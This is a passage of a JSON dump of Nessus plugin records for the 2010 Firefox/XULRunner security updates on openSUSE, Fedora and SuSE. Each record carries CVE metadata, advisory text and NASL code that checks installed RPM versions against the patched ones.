prevent script\nexecution could have such protection bypassed. An attacker could\nupload a SVG document containing JavaScript as a binary file to a\nwebsite, embed the SVG document into a malicous page on another site,\nand gain access to the script environment from the SVG-serving site,\nbypassing the same-origin policy.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=576969\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaFirefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-xpcom190\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"MozillaFirefox-3.0.18-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"MozillaFirefox-branding-upstream-3.0.18-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"MozillaFirefox-translations-3.0.18-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-xulrunner190-devel-1.9.0.18-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"python-xpcom190-1.9.0.18-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-3.0.18-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-branding-upstream-3.0.18-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"MozillaFirefox-translations-3.0.18-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:32:54", "references": ["http://www.nessus.org/u?23cb4f62", "http://www.nessus.org/u?d5a22aeb", "http://www.mozilla.org/security/known-", "http://www.nessus.org/u?f7999407", "https://bugzilla.redhat.com/show_bug.cgi?id=566047", "http://www.nessus.org/u?429f9532", "https://bugzilla.redhat.com/show_bug.cgi?id=566049", "http://www.nessus.org/u?809be192", "https://bugzilla.redhat.com/show_bug.cgi?id=566050", "http://www.nessus.org/u?755e870c", "http://www.nessus.org/u?c5fac908", "https://bugzilla.redhat.com/show_bug.cgi?id=566052", "http://www.nessus.org/u?774cc8be", "https://bugzilla.redhat.com/show_bug.cgi?id=566051"], "pluginID": "47268", "description": "Update to new upstream Firefox version 3.5.8, fixing multiple security issues detailed in the upstream advisories:\nhttp://www.mozilla.org/security/known- vulnerabilities/firefox35.html#firefox3.5.8 Update also includes all packages depending on gecko-libs rebuilt against new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2010-07-01T00:00:00", "title": "Fedora 12 : blam-1.8.5-22.fc12 / firefox-3.5.8-1.fc12 / galeon-2.0.7-20.fc12 / etc (2010-1727)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2016-12-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xulrunner", "p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed", "cpe:/o:fedoraproject:fedora:12", "p-cpe:/a:fedoraproject:fedora:gnome-python2-extras", "p-cpe:/a:fedoraproject:fedora:blam", "p-cpe:/a:fedoraproject:fedora:gnome-web-photo", "p-cpe:/a:fedoraproject:fedora:galeon", "p-cpe:/a:fedoraproject:fedora:mozvoikko"], "id": "FEDORA_2010-1727.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=47268", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-1727.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47268);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:31:53 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n script_xref(name:\"FEDORA\", value:\"2010-1727\");\n\n script_name(english:\"Fedora 12 : blam-1.8.5-22.fc12 / firefox-3.5.8-1.fc12 / galeon-2.0.7-20.fc12 / etc (2010-1727)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream Firefox version 3.5.8, fixing multiple security\nissues detailed in the upstream advisories:\nhttp://www.mozilla.org/security/known-\nvulnerabilities/firefox35.html#firefox3.5.8 Update also includes all\npackages depending on gecko-libs rebuilt against new version of\nFirefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/known-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=566047\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=566049\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=566050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=566051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=566052\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035421.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?429f9532\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035422.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5fac908\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035423.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?23cb4f62\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035424.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?809be192\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035425.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7999407\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035426.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?755e870c\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035427.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?774cc8be\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035428.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5a22aeb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:blam\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:galeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-web-photo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"blam-1.8.5-22.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"firefox-3.5.8-1.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"galeon-2.0.7-20.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"gnome-python2-extras-2.25.3-16.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"gnome-web-photo-0.9-5.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"mozvoikko-1.0-8.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"perl-Gtk2-MozEmbed-0.08-6.fc12.11\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"xulrunner-1.9.1.8-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"blam / firefox / galeon / gnome-python2-extras / gnome-web-photo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:07", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://support.novell.com/security/cve/CVE-2010-0159.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://support.novell.com/security/cve/CVE-2009-3988.html", "http://support.novell.com/security/cve/CVE-2009-1571.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html", "http://support.novell.com/security/cve/CVE-2010-0160.html", "http://support.novell.com/security/cve/CVE-2010-0162.html"], "pluginID": "44910", "description": "Mozilla Firefox was upgraded to version 3.5.8, fixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer. (MFSA 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy. (MFSA 2010-05 / CVE-2010-0162)", "edition": 5, "reporter": "Tenable", "published": "2010-02-25T00:00:00", "title": "SuSE 10 Security Update : Mozilla Firefox (ZYPP Patch Number 6863)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2016-12-22T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_MOZILLAFIREFOX-6863.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44910", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44910);\n script_version (\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:42:27 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"SuSE 10 Security Update : Mozilla Firefox (ZYPP Patch Number 6863)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox was upgraded to version 3.5.8, fixing various bugs and\nsecurity issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several\n stability bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these crashes\n showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via\n TippingPoint's Zero Day Initiative that Mozilla's\n implementation of Web Workers contained an error in its\n handling of array data types when processing posted\n messages. This error could be used by an attacker to\n corrupt heap memory and crash the browser, potentially\n running arbitrary code on a victim's computer. (MFSA\n 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported that the HTML parser incorrectly freed used\n memory when insufficient space was available to process\n remaining input. Under such circumstances, memory\n occupied by in-use objects was freed and could later be\n filled with attacker-controlled text. These conditions\n could result in the execution or arbitrary code if\n methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft\n Vulnerability Research reported that the properties set\n on an object passed to showModalDialog were readable by\n the document contained in the dialog, even when the\n document was from a different domain. This is a\n violation of the same-origin policy and could result in\n a website running untrusted JavaScript if it assumed the\n dialogArguments could not be initialized by another\n site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported\n that when a SVG document which is served with\n Content-Type: application/octet-stream is embedded into\n another document via an tag with type='image/svg+xml',\n the Content-Type is ignored and the SVG document is\n processed normally. A website which allows arbitrary\n binary data to be uploaded but which relies on\n Content-Type: application/octet-stream to prevent script\n execution could have such protection bypassed. An\n attacker could upload a SVG document containing\n JavaScript as a binary file to a website, embed the SVG\n document into a malicous page on another site, and gain\n access to the script environment from the SVG-serving\n site, bypassing the same-origin policy. (MFSA 2010-05 /\n CVE-2010-0162)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-04.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0159.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0162.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6863.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"MozillaFirefox-3.5.8-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"MozillaFirefox-translations-3.5.8-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mozilla-xulrunner191-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mozilla-xulrunner191-translations-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"MozillaFirefox-3.5.8-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"MozillaFirefox-translations-3.5.8-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mozilla-xulrunner191-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mozilla-xulrunner191-translations-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.8-1.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:57:53", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=576969"], "pluginID": "44899", "description": "Mozilla Firefox was upgraded to version 3.0.18, fixing various bugs and security issues.\n\nFollowing security issues have been fixed: MFSA 2010-01 / CVE-2010-0159: Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.\n\nMFSA 2010-02 / CVE-2010-0160: Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer.\n\nMFSA 2010-03 / CVE-2009-1571: Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n\nMFSA 2010-04 / CVE-2009-3988: Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site.\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\nMFSA 2010-05 / CVE-2010-0162: Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an <embed> tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy.", "edition": 5, "reporter": "Tenable", "published": "2010-02-25T00:00:00", "title": "openSUSE Security Update : MozillaFirefox (MozillaFirefox-2052)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2016-12-21T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-gnomevfs-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-translations-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-devel", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-translations", 